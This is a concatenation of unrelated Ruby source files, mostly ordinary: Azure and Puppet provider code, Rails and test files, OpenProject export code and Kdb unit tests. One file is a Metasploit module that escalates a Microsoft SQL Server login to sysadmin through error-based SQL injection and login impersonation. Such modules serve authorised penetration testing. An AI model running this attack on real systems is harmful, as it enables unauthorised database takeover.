self.op_param("properties", "body", "properties", "properties"),
self.op_param("resourceGroupName", "path", "resource_group_name", "resource_group_name"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/resourceGroups/%{resource_group_name}/providers/Microsoft.Network/ddosProtectionPlans/%{ddos_protection_plan_name}", "Put", "[application/json]")
end
def self.invoke_update(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_CreateOrUpdate")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("ddosProtectionPlanName", "path", "name", "ddos_protection_plan_name"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("parameters", "body", "parameters", "parameters"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("resourceGroupName", "path", "resource_group_name", "resource_group_name"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/resourceGroups/%{resource_group_name}/providers/Microsoft.Network/ddosProtectionPlans/%{ddos_protection_plan_name}", "Put", "[application/json]")
end
def self.invoke_delete(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_Delete")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("ddosProtectionPlanName", "path", "name", "ddos_protection_plan_name"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("resourceGroupName", "path", "resource_group_name", "resource_group_name"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/resourceGroups/%{resource_group_name}/providers/Microsoft.Network/ddosProtectionPlans/%{ddos_protection_plan_name}", "Delete", "[application/json]")
end
def self.invoke_list_with_params(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_List")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/providers/Microsoft.Network/ddosProtectionPlans", "Get", "[application/json]")
end
def self.invoke_get_one(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_Get")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("ddosProtectionPlanName", "path", "name", "ddos_protection_plan_name"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("resourceGroupName", "path", "resource_group_name", "resource_group_name"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/resourceGroups/%{resource_group_name}/providers/Microsoft.Network/ddosProtectionPlans/%{ddos_protection_plan_name}", "Get", "[application/json]")
end
def self.authenticate(path_params, query_params, header_params, body_params)
token = fetch_oauth2_token
if token
header_params["Authorization"] = "Bearer #{token}"
return true
else
return false
end
end
def self.fetch_oauth2_token
Puppet.info("Getting oauth2 token")
@client_id = ENV["azure_client_id"]
@client_secret = ENV["azure_client_secret"]
@tenant_id = ENV["azure_tenant_id"]
uri = URI("https://login.microsoftonline.com/#{@tenant_id}/oauth2/token")
response = Net::HTTP.post_form(uri,
"grant_type" => "client_credentials",
"client_id" => @client_id,
"client_secret" => @client_secret,
"resource" => "https://management.azure.com/")
Puppet.debug("get oauth2 token response code is #{response.code} and body is #{response.body}")
success = response.is_a? Net::HTTPSuccess
if success
return JSON[response.body]["access_token"]
else
raise Puppet::Error, "Unable to get oauth2 token - response is #{response} and body is #{response.body}"
end
end
def exists?
return_value = @property_hash[:ensure] && @property_hash[:ensure] != :absent
Puppet.info("Checking if resource #{name} of type <no value> exists, returning #{return_value}")
return_value
end
def self.add_keys_to_request(request, hash)
if hash
hash.each { |x, v| request[x] = v }
end
end
def self.to_query(hash)
if hash
return_value = hash.map { |x, v| "#{x}=#{v}" }.reduce { |x, v| "#{x}&#{v}" }
if !return_value.nil?
return return_value
end
end
return ""
end
def self.op_param(name, inquery, paramalias, namesnake)
operation_param = {:name => name, :inquery => inquery, :paramalias => paramalias, :namesnake => namesnake}
return operation_param
end
def self.call_op(path_params, query_params, header_params, body_params, parent_host, operation_path, operation_verb, parent_consumes)
uri_string = "https://#{parent_host}#{operation_path}" % path_params
uri_string = uri_string + "?" + to_query(query_params)
header_params["Content-Type"] = "application/json" # first of #{parent_consumes}
if authenticate(path_params, query_params, header_params, body_params)
Puppet.info("Authentication succeeded")
uri = URI(uri_string)
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == "https") do |http|
if operation_verb == "Get"
req = Net::HTTP::Get.new(uri)
elsif operation_verb == "Put"
req = Net::HTTP::Put.new(uri)
elsif operation_verb == "Delete"
req = Net::HTTP::Delete.new(uri)
end
add_keys_to_request(req, header_params)
if body_params
req.body = body_params.to_json
end
Puppet.debug("URI is (#{operation_verb}) #{uri}, body is #{body_params}, query params are #{query_params}, headers are #{header_params}")
response = http.request req # Net::HTTPResponse object
Puppet.debug("response code is #{response.code} and body is #{response.body}")
success = response.is_a? Net::HTTPSuccess
Puppet.info("Called (#{operation_verb}) endpoint at #{uri}, success was #{success}")
return response
end
end
end
end
# this is the end of the ruby class
| 43.04428 | 279 | 0.664681 |
28cf983cd265656fa2dab25b878cc7a34efa8872 | 1,209 | # frozen_string_literal: true
# Copyright 2015 Australian National Botanic Gardens
#
# This file is part of the NSL Editor.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require "test_helper"
require "models/instance/as_typeahead/for_synonymy/test_helper.rb"
# Single instance typeahead search.
class ForNameAndReferenceYearTest < ActiveSupport::TestCase
test "name and wrong year search" do
ta = Instance::AsTypeahead::ForSynonymy.new("angophora costata 1789",
names(:a_species).id)
assert ta.results.class == Array, "Results should be an array."
assert ta.results.size.zero?, "Results should include no records."
end
end
| 39 | 76 | 0.724566 |
4a5bf599fa4b7951dc3d9348b730a70776d60c95 | 266 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
require '2016-03-01/generated/azure_mgmt_scheduler'
require 'profiles/latest/scheduler_latest_profile_client'
| 44.333333 | 94 | 0.823308 |
33d440043bd5aef9fca5d91eaae471f885801f8e | 424 | # frozen_string_literal: true
class CardSetsController < ApplicationController
before_action :authenticate_user!
def index
@card_list = find_card_list
@card_sets = find_card_sets
end
private
def find_card_list
return nil if params[:list_id].blank?
CardList.find_by!(user_id: current_user.id, slug: params[:list_id])
end
def find_card_sets
@card_sets = CardSet.display_order
end
end
| 18.434783 | 71 | 0.747642 |
f88d33c847805c283e54c36d0ddb9d59b54ab3d1 | 1,247 | class String
def clean
self.dup.clean!
end
def clean!
if self.match(/^\s+$/)
return nil
end
self.strip!
self.gsub!(/\s{2,}/, ' ')
self
end
def stub
I18n.transliterate(self).downcase.squish.gsub(/[^a-z\s]/, '').gsub(' ', '-')
end
end
def formatoTelefono digitos, sinLD = false
formatted = case digitos.length
when 13, digitos.match(/^044/)
# 044 55 5555 5555
if digitos.match(/^044(55|33|81)/)
digitos.scan(/^(\d{3})(\d{2})(\d{4})(\d{4})$/)
else
# 044 777 777 777
digitos.scan(/^(\d{3})(\d{3})(\d{3})(\d{3})$/)
end
when 12
# 01 55 5555 5555
if digitos.match(/^01(55|33|81)/)
digitos.scan(/^(\d{2})(\d{2})(\d{4})(\d{4})$/)
else
# 01 777 777 7777
digitos.scan(/^(\d{2})(\d{3})(\d{3})(\d{4})$/)
end
# 777 777 7777
when 10 then digitos.scan(/^(\d{3})(\d{3})(\d{4})$/)
# 5555 5555
when 8 then digitos.scan(/^(\d{4})(\d{4})$/)
# 777 7777
when 7 then digitos.scan(/^(\d{3})(\d{4})$/)
else
raise "No se que hacer con #{digitos.length} dígitos <#{digitos.match(/^044/)}>"
end.flatten.join(' ')
formatted = formatted.gsub(/^01\s?/, '') if sinLD
formatted
end | 23.980769 | 86 | 0.513232 |
e2f781eb4f3cb48deb857dcd0f4e5d88da23e0d7 | 6,266 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::MSSQL_SQLI
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server - SQLi Escalate Execute As',
'Description' => %q{
This module can be used escalate privileges if the IMPERSONATION privilege has been
assigned to the user via error based SQL injection. In most cases, this results in
additional data access, but in some cases it can be used to gain sysadmin privileges.
The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--
},
'Author' => ['nullbind <scott.sutherland[at]netspi.com>'],
'License' => MSF_LICENSE,
'References' => [['URL','http://msdn.microsoft.com/en-us/library/ms178640.aspx']]
))
end
def run
# Get the database user name
print_status("#{peer} - Grabbing the database user name...")
db_user = get_username
if db_user.nil?
print_error("#{peer} - Unable to grab user name...")
return
else
print_good("#{peer} - Database user: #{db_user}")
end
# Grab sysadmin status
print_status("#{peer} - Checking if #{db_user} is already a sysadmin...")
admin_status = check_sysadmin
if admin_status.nil?
print_error("#{peer} - Couldn't retrieve user status, aborting...")
return
elsif admin_status == '1'
print_error("#{peer} - #{db_user} is already a sysadmin, no escalation needed.")
return
else
print_status("#{peer} - #{db_user} is NOT a sysadmin, let's try to escalate privileges.")
end
# Get list of users that can be impersonated
print_status("#{peer} - Enumerating a list of users that can be impersonated...")
imp_user_list = check_imp_users
if imp_user_list.nil? || imp_user_list.empty?
print_error("#{peer} - Sorry, the current user doesnt have permissions to impersonate anyone.")
return
else
# Display list of users that can be impersonated
print_good("#{peer} - #{imp_user_list.length} users can be impersonated:")
imp_user_list.each do |dbuser|
print_status("#{peer} - #{dbuser}")
end
end
# Check if any of the users that can be impersonated are sysadmins
print_status("#{peer} - Checking if any of them are sysadmins...")
imp_user_sysadmin = check_imp_sysadmin(imp_user_list)
if imp_user_sysadmin.nil?
print_error("#{peer} - Sorry, none of the users that can be impersonated are sysadmins.")
return
end
# Attempt to escalate to sysadmin
print_status("#{peer} - Attempting to impersonate #{imp_user_sysadmin}...")
escalate_privs(imp_user_sysadmin,db_user)
admin_status = check_sysadmin
if admin_status && admin_status == '1'
print_good("#{peer} - Success! #{db_user} is now a sysadmin!")
else
print_error("#{peer} - Fail buckets, something went wrong.")
end
end
def get_username
# Setup query to check for database username
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
sql = "(select '#{clue_start}'+SYSTEM_USER+'#{clue_end}')"
# Run query
result = mssql_query(sql)
# Parse result
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
user_name = $1
else
user_name = nil
end
user_name
end
def check_sysadmin
# Setup query to check for sysadmin
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
sql = "(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin'))as varchar)+'#{clue_end}')"
# Run query
result = mssql_query(sql)
# Parse result
if result && result.body && result.body =~ /#{clue_start}([^>]*)#{clue_end}/
status = $1
else
status = nil
end
status
end
def check_imp_users
# Setup query to check for trusted databases owned by sysadmins
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
# Setup query
sql = "(select cast((SELECT DISTINCT '#{clue_start}'+b.name+'#{clue_end}'
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE' for xml path('')) as int))"
# Run query
res = mssql_query(sql)
unless res && res.body
return nil
end
#Parse results
parsed_result = res.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
if parsed_result && !parsed_result.empty?
parsed_result.flatten!
parsed_result.uniq!
end
parsed_result
end
def check_imp_sysadmin(imp_user_list)
# Check if the user has the db_owner role is any databases
imp_user_list.each do |imp_user|
# Setup query
clue_start = Rex::Text.rand_text_alpha(8 + rand(4))
clue_end = Rex::Text.rand_text_alpha(8 + rand(4))
sql = "(select '#{clue_start}'+cast((select is_srvrolemember('sysadmin','#{imp_user}'))as varchar)+'#{clue_end}')"
# Run query
result = mssql_query(sql)
unless result && result.body
next
end
#Parse results
parsed_result = result.body.scan(/#{clue_start}(.*?)#{clue_end}/m)
if parsed_result && !parsed_result.empty?
parsed_result.flatten!
parsed_result.uniq!
end
# check if user is a sysadmin
if parsed_result && parsed_result[0] == '1'
print_good("#{peer} - #{imp_user} is a sysadmin!")
return imp_user
else
print_status("#{peer} - #{imp_user} is NOT a sysadmin")
end
end
nil
end
# Attempt to escalate privileges
def escalate_privs(imp_user,db_user)
# Setup Query - Impersonate the first sysadmin user on the list
evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember 'MyUser1','sysadmin';Revert;--"
# Execute Query
mssql_query(evil_sql)
end
end
| 31.019802 | 120 | 0.649697 |
08c6971630ad54665c7379b23ff973b36fd88dcc | 310 | name 'hadoop_slave_conf_setup'
maintainer 'YOUR_COMPANY_NAME'
maintainer_email 'YOUR_EMAIL'
license 'All rights reserved'
description 'Installs/Configures hadoop_slave_conf_setup'
long_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))
version '0.1.0'
| 38.75 | 72 | 0.719355 |
018447934ab4848b2e948ffbceedd50500fd3d0c | 2,604 | class OpenProject::XlsExport::XlsViews::CostEntryTable < OpenProject::XlsExport::XlsViews
def generate
@spreadsheet = OpenProject::XlsExport::SpreadsheetBuilder.new(I18n.t(:label_money))
default_query = serialize_query_without_hidden(@query)
available_cost_type_tabs(options[:cost_types]).each_with_index do |(unit_id, name), idx|
setup_query_for_tab(default_query, unit_id)
spreadsheet.worksheet(idx, name)
build_spreadsheet
end
spreadsheet
end
def setup_query_for_tab(query, unit_id)
@query = CostQuery.deserialize(query)
@cost_type = nil
@unit_id = unit_id
if @unit_id != 0
@query.filter :cost_type_id, operator: '=', value: @unit_id.to_s
@cost_type = CostType.find(unit_id) if unit_id.positive?
end
end
def build_spreadsheet
set_title
build_header
format_columns
build_cost_rows
build_footer
spreadsheet
end
def build_header
spreadsheet.add_headers(headers)
end
def build_cost_rows
query.each_direct_result do |result|
spreadsheet.add_row(cost_row(result))
end
end
def format_columns
spreadsheet.add_format_option_to_column(headers.length - 3,
number_format: number_format)
spreadsheet.add_format_option_to_column(headers.length - 1,
number_format: currency_format)
end
def cost_row(result)
current_cost_type_id = result.fields['cost_type_id'].to_i
cost_entry_attributes
.map { |field| show_field field, result.fields[field.to_s] }
.concat(
[
show_result(result, current_cost_type_id), # units
cost_type_label(current_cost_type_id, @cost_type), # cost type
show_result(result, 0) # costs/currency
]
)
end
def build_footer
footer = [''] * cost_entry_attributes.size
footer += if show_result(query, 0) != show_result(query)
one_unit_type_footer
else
multiple_unit_types_footer
end
spreadsheet.add_sums(footer) # footer
end
def one_unit_type_footer
[show_result(query), '', show_result(query, 0)]
end
def multiple_unit_types_footer
['', '', show_result(query)]
end
def headers
cost_entry_attributes
.map { |field| label_for(field) }
.concat([CostEntry.human_attribute_name(:units), CostType.model_name.human, CostEntry.human_attribute_name(:costs)])
end
def cost_entry_attributes
%i[spent_on user_id activity_id work_package_id comments project_id]
end
end
| 26.845361 | 122 | 0.678955 |
bb550e11b2fbb8755c420ae7597b0df3444c6017 | 632 | atom_feed do |feed|
feed.title("Clipster - Recent")
feed.updated(@updated_at) unless @updated_at.nil?
@clips.each do |clip|
feed.entry(clip) do |entry|
if clip.expires.nil?
entry.title("#{clip.title}. A #{clip.language} clip that never expires.")
else
entry.title("#{clip.title}. A #{clip.language} clip that expires on #{clip.expires}.")
end
entry.content('<div class="clip">' + clip.div.html_safe + '</div>', :type => 'html')
#TODO set author once user integration is compleate
#entry.author do |author|
# author.name("DHH")
#end
end
end
end | 31.6 | 94 | 0.610759 |
bba1a7d2f362e177b7c2cb5066a6bf0c0d579a72 | 894 | # frozen_string_literal: true
require_relative './_common'
module GitConfigModule
include CommonModule
def evaluate(config_hash)
with_plan do |plan|
missing = []
current_config = Kernel.send('`', 'git config --global -l').strip.split("\n").map { |l| l.split('=', 2) }.to_h
flat_hash(config_hash).each do |k, v|
key = k.map(&:to_s).join('.').downcase
missing << [key, v.to_s] if current_config[key] != v.to_s
end
plan << [:git_config, missing] unless missing.empty?
end
end
def run(values)
values.each do |key, value|
sh "git config --global #{key} #{value.to_s.inspect}"
end
end
private
def flat_hash(hash, k = [])
return { k => hash } unless hash.is_a?(Hash)
hash.inject({}) { |h, v| h.merge! flat_hash(v[-1], k + [v[0]]) }
end
end
ModuleRegistry.register_module :git_config, GitConfigModule
| 24.162162 | 116 | 0.620805 |
0342515bdb3d02ed5abc02b0b3addc91af40a21f | 411 | require "archived_concern"
class ServiceInventory < ApplicationRecord
include ArchivedConcern
belongs_to :tenant
belongs_to :source
belongs_to :refresh_state_part, :optional => true
has_many :service_instances
has_many :service_instance_nodes
has_many :service_inventory_tags
has_many :service_offerings
has_many :service_offering_nodes
acts_as_tenant(:tenant)
acts_as_taggable_on
end
| 21.631579 | 51 | 0.819951 |
5d232756fe3481e5297cd8ee6dc23121585cc51e | 318 | # frozen_string_literal: true
module RailsBand
module ActionController
module Event
# A wrapper for the event that is passed to `exist_fragment?.action_controller`.
class ExistFragment < BaseEvent
def key
@key ||= @event.payload.fetch(:key)
end
end
end
end
end
| 21.2 | 86 | 0.654088 |
1af348336ee3fbf1a05a051f111f68db011d5456 | 912 | require 'sql/force_index_expression'
module Sequel
module Plugins
module ForceIndex
module DatasetMethods
def select_sql()
puts @opts.inspect
puts "is it working #{@opts[:from]}"
result = super
puts result
#raise Exception.new('ad')
result
end
def join_table(type, table, expr=nil, opts=OPTS, &block)
puts "joins .... "
puts table
puts opts.inspect
puts "---"
super type, table, expr, opts, &block
end
def force_index(index)
# ADD USE INDEX ( ' .... ')
puts "force --- "
puts @opts[:from].last
idx = @opts[:from].length - 1
@opts[:from][idx] = ::SQL::ForceIndexExpression.new(@opts[:from].last, index).to_s
self
end
end
end
end
end | 26.057143 | 94 | 0.495614 |
4acab5cd2277cd37f1f8838bee5a3ba7e0006899 | 389 | # frozen_string_literal: true
module Types
class EpicSortEnum < BaseEnum
graphql_name 'EpicSort'
description 'Roadmap sort values'
value 'start_date_desc', 'Start date at descending order'
value 'start_date_asc', 'Start date at ascending order'
value 'end_date_desc', 'End date at descending order'
value 'end_date_asc', 'End date at ascending order'
end
end
| 27.785714 | 61 | 0.737789 |
ff8cfad431b4ffd20cc02c2cdf77d9e1bfe134cc | 17,029 | #!/usr/bin/env ruby
##
# @file
#
# @brief unit test cases for Kdb::KeySet
#
# @copyright BSD License (see doc/LICENSE.md or http://www.libelektra.org)
#
require 'kdb'
require 'test/unit'
require_relative 'test_helper'
class KdbKeySetTestCases < Test::Unit::TestCase
def test_keySet_new_simple
assert_nothing_raised do
ks = Kdb::KeySet.new
assert_not_nil ks
assert_instance_of Kdb::KeySet, ks
assert_equal 0, ks.size
end
end
def test_keySet_new_with_key
assert_nothing_raised do
k = Kdb::Key.new "user/key", value: "hello"
ks = Kdb::KeySet.new k
assert_equal 1, ks.size
assert_equal k, ks.head
end
end
def test_keySet_new_with_invalid_argument
assert_raise ArgumentError do
Kdb::KeySet.new "not a key"
end
end
def test_keySet_new_with_keySet
assert_nothing_raised do
ks1 = Kdb::KeySet.new
ks1 << Kdb::Key.new("user/ks1")
ks1 << Kdb::Key.new("user/ks2")
ks2 = Kdb::KeySet.new ks1
assert_equal 2, ks2.size
ks2 << Kdb::Key.new("user/ks3")
assert_equal 3, ks2.size
assert_equal "user/ks3", ks2.tail.name
# ensure old KeySet holds only the first 2 Keys
assert_equal 2, ks1.size
assert_equal "user/ks2", ks1.tail.name
end
end
def test_keySet_new_with_array
assert_nothing_raised do
a = Array.new
a << Kdb::Key.new("user/ks1")
a << Kdb::Key.new("user/ks2")
a << Kdb::Key.new("user/ks3")
a << Kdb::Key.new("user/ks4")
ks = Kdb::KeySet.new a
assert_equal 4, ks.size
i = 0
ks.each { |e|
assert_equal a[i], e
i += 1
}
ks = Kdb::KeySet.new [
Kdb::Key.new("user/key1"),
Kdb::Key.new("user/key2"),
Kdb::Key.new("user/key3")
]
assert_equal 3, ks.size
assert_equal "key1", ks.head.basename
# ensure also larger arrays, with more than 16 (preallocated) elements
# work correctly
a = (1..40).map { |n| Kdb::Key.new("user/key%02d" % n) }
ks = Kdb::KeySet.new a
assert_equal 40, ks.size
assert_equal "key40", ks.tail.basename
end
assert_raise ArgumentError do
Kdb::KeySet.new [
Kdb::Key.new("user/key"),
"not a key",
1
]
end
end
def test_keySet_append
assert_nothing_raised do
k = Kdb::Key.new "user/ks1", value: "val", meta: "metaval"
ks = Kdb::KeySet.new
num = ks.append k
assert_equal 1, ks.size
assert_equal 1, num
assert_equal k, ks.head
assert_equal k, ks.tail
ks << Kdb::Key.new("user/ks2", value: "val2")
assert_equal 2, ks.size
assert_equal k, ks.head
assert_equal "user/ks2", ks.tail.name
end
end
def test_keySet_append_KeySet
assert_nothing_raised do
ks1 = Kdb::KeySet.new
num = ks1 << Kdb::Key.new("user/ks1")
assert_equal 1, num
num = ks1 << Kdb::Key.new("user/ks2")
assert_equal 2, num
ks2 = Kdb::KeySet.new
num = ks2 << Kdb::Key.new("user/ks3")
assert_equal 1, num
num = ks2 << Kdb::Key.new("user/ks4")
assert_equal 2, num
num = ks1 << ks2
assert_equal 4, num
assert_equal 4, ks1.size
assert_equal 2, ks2.size
end
end
def test_keySet_append_array
assert_nothing_raised do
a = Array.new
a << Kdb::Key.new("user/ks2")
a << Kdb::Key.new("user/ks1")
ks = Kdb::KeySet.new
num = ks.append a
assert_equal 2, num
assert_equal 2, ks.size
assert_equal a[0], ks[1]
assert_equal a[1], ks[0]
end
assert_nothing_raised do
ks = Kdb::KeySet.new
num = ks << [
Kdb::Key.new("user/ks1"),
Kdb::Key.new("user/ks2"),
Kdb::Key.new("user/ks3")
]
assert_equal 3, num
assert_equal 3, ks.size
assert_equal "user/ks1", ks.head.name
end
a = Array.new
a << "not a Key"
a << 1
ks = Kdb::KeySet.new
assert_raise ArgumentError do
ks.append a
end
end
def test_keySet_append_invalid_type
assert_raise ArgumentError do
ks = Kdb::KeySet.new
ks.append "not a Key"
end
end
def test_keySet_get_by_cursor_or_index
assert_nothing_raised do
ks = Kdb::KeySet.new (0..9).map { |i| Kdb::Key.new "user/key%02d" % i }
assert_equal 10, ks.size
# test get by index
for i in (0..9) do
assert_equal ("user/key%02d" % i), ks.at(i).name
assert_equal ("user/key%02d" % i), ks[i].name
end
# test get by cursor
ks.rewind
assert ks.cursor < 0
assert_nil ks.current
for i in (0..9) do
nxt = ks.next
cur = ks.current
assert_equal ("user/key%02d" % i), nxt.name
assert_equal cur, nxt
assert_equal i, ks.cursor
end
assert_nil ks.next
assert_nil ks.current
assert ks.cursor < 0
# test get by invalid index
assert_nil ks[10]
assert_nil ks[-11]
assert_nil ks.at(200)
end
end
def test_keySet_pop
assert_nothing_raised do
ks = Kdb::KeySet.new
assert_nil ks.pop
k = Kdb::Key.new("user/k0")
ks << k
assert_equal 1, ks.size
assert_equal k, ks.pop
assert_equal 0, ks.size
k = Kdb::Key.new("user/k1")
ks << k
assert_equal 1, ks.size
assert_equal k, ks.pop
assert_equal 0, ks.size
k2 = Kdb::Key.new("user/k2")
k3 = Kdb::Key.new("user/k3")
k4 = Kdb::Key.new("user/k4")
k5 = Kdb::Key.new("user/k5")
ks << [k2, k3, k4, k5]
assert_equal 4, ks.size
assert_equal k5, ks.pop
assert_equal k4, ks.pop
assert_equal k3, ks.pop
assert_equal k2, ks.pop
assert_equal 0, ks.size
assert_nil ks.pop
end
end
def test_keySet_head_tail
assert_nothing_raised do
ks = Kdb::KeySet.new
assert_equal 0, ks.size
assert_nil ks.head
assert_nil ks.tail
a = (0..3).map { |i| Kdb::Key.new "user/key#{i}" }
ks << a[0]
assert_equal a[0], ks.head
assert_equal a[0], ks.tail
ks << a[1]
assert_equal a[0], ks.head
assert_equal a[1], ks.tail
ks << a[2]
assert_equal a[0], ks.head
assert_equal a[2], ks.tail
ks << a[3]
assert_equal a[0], ks.head
assert_equal a[3], ks.tail
assert_equal a[3], ks.pop
assert_equal a[2], ks.tail
assert_equal a[2], ks.pop
assert_equal a[1], ks.tail
assert_equal a[1], ks.pop
assert_equal a[0], ks.tail
assert_equal a[0], ks.pop
